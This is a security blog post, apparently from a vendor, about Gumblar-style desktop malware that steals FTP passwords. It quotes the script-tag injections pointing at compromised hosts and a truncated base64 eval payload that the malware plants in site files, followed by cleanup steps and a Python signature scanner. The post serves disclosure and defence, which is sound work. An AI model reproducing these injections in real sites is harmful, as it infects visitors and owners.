Web site security – It starts with your desktop

If you have a web site and you want it to be secure, the first place you have to protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop viruses (generally called Gumblar, port 8080, etc.). These viruses steal your FTP password and then do the following things:

They infect all .js files on your site with entries like these:

document.write( <script src="http://wap.northernplumbingandheating.com/assets/postinfo.php
document.write( <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php

They infect every .html file with entries similar to these:

script src="http://wap.northernplumbingandheating.com/assets/postinfo.php"
script src="http://shopping-dubai.com/images/runActiveContent.php"
script src="http://stb-umhau.de/images/muffin35.php"
script src="http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php"

They infect every PHP file with code similar to this:

eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF..

They also create backdoor files called gifimg.php in multiple directories.

Note that the domains change from infection to infection; this is just a small sample of them:

http://stb-umhau.de/images/muffin35.php
http://shopping-dubai.com/images/runActiveContent.php
http://wap.northernplumbingandheating.com
http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
http://applebe.dothome.co.kr/bbs/fla-3.php

How to clean my desktop if I have this virus?

  1. Install an anti-virus and make sure it detected and removed the problem. If it didn’t, try a different one :)
  2. Change your FTP passwords.
  3. Start using SFTP instead of FTP.
  4. Do not store your FTP/SFTP password on your desktop.

How to clean my site if it is infected?

You can hire us to clean it up for you and monitor your sites going forward: Malware Removal

Or, if you prefer to do it yourself:

  1. Scan your site to see where the malware is and how it is called on your site.
  2. Download your whole site to your desktop.
  3. Use grep (or wingrep) and search for src=http and eval(base64_decode("aW.
  4. Remove all those entries as well as the gifimg.php backdoors.
  5. Re-upload your site.

That should clean up your site. Note that this only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this cleanup procedure may not work completely.
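As an added example (not part of the original post), here is a small Python scanner that automates step 3 over a downloaded copy of the site: it flags the injected script tags in .html files, the document.write() injection in .js files, the eval(base64_decode("aW...")) marker in PHP files (decoding the blob so you can see what the eval() would run), and the gifimg.php backdoor files. The hostnames in the sample site are placeholders and the patterns are constructed from the snippets quoted above; adjust them to whatever your own site scan shows.

```python
import base64
import re
import tempfile
from pathlib import Path

# Signatures built from the Gumblar / MW:JS:150 snippets quoted in the post (constructed; tune to your copy).
HTML_SCRIPT = re.compile(r'<script\s+src=["\']?https?://[^"\'\s>]+\.php', re.I)
JS_DOCWRITE = re.compile(r'document\.write\(\s*["\']?\s*<script\s+src=["\']?https?://', re.I)
PHP_EVAL = re.compile(r'eval\(\s*base64_decode\(\s*["\']\s*(aW[A-Za-z0-9+/]*)')
BACKDOOR_NAMES = {"gifimg.php"}  # dropped into multiple directories per the post

# Constructed sample site: hostnames are placeholders; the base64 blob is the one quoted in the post.
SAMPLES = {
    "index.html": '<html><body><script src="http://bad.example.invalid/x/postinfo.php"></script></body></html>',
    "js/menu.js": "function nav(){}\ndocument.write( '<script src=\"http://bad.example.invalid/y/banner.php\"></' + 'script>');",
    "inc/config.php": '<?php eval(  base64_decode(" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEd")); ?>',
    "images/gifimg.php": "<?php /* dropped backdoor */ ?>",
    "about.html": "<html><body>clean page</body></html>",
}


def scan_file(relpath: str, content: str) -> list:  # (finding, detail) tuples for one file
    name = Path(relpath).name.lower()
    findings = [("backdoor-file", relpath)] if name in BACKDOOR_NAMES else []
    if name.endswith((".html", ".htm")):
        findings += [("injected-script", m.group(0)) for m in HTML_SCRIPT.finditer(content)]
    elif name.endswith(".js"):
        findings += [("js-docwrite", m.group(0)) for m in JS_DOCWRITE.finditer(content)]
    elif name.endswith(".php"):
        for m in PHP_EVAL.finditer(content):  # decode the (truncated) payload to see what eval() runs
            blob = m.group(1)
            findings.append(("php-eval-b64", base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("latin-1")))
    return findings


def scan_tree(root: str) -> dict:  # relative path -> findings, infected files only
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            rel = p.relative_to(root).as_posix()
            hits = scan_file(rel, p.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[rel] = hits
    return report


def demo() -> dict:  # write the constructed sample site to a temp dir and scan it
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Run scan_tree() against the directory you downloaded the site into; every path it reports is one to clean by hand before re-uploading.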

If your site is hacked (or contains malware) and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://mimoYmima.com/ Brent Lagerman

    most of our passwords are very long and impossible to remember so to not store them on the desktop when we’re dealing with ~50 websites would be a huge pain. Every time we wanted to connect we’d have to look up the password and put it in manually… is there an easier way that is secure? I was under the impression that the passwords (on our mac computers anyway) were safe in the keychain?

  • http://www.neteffects.com.au/helpdesk help desk

    It’s always very important to keep track of everything that your system does. Do not ignore or underestimate the power of your desktop. You need to reconsider its importance all the time.
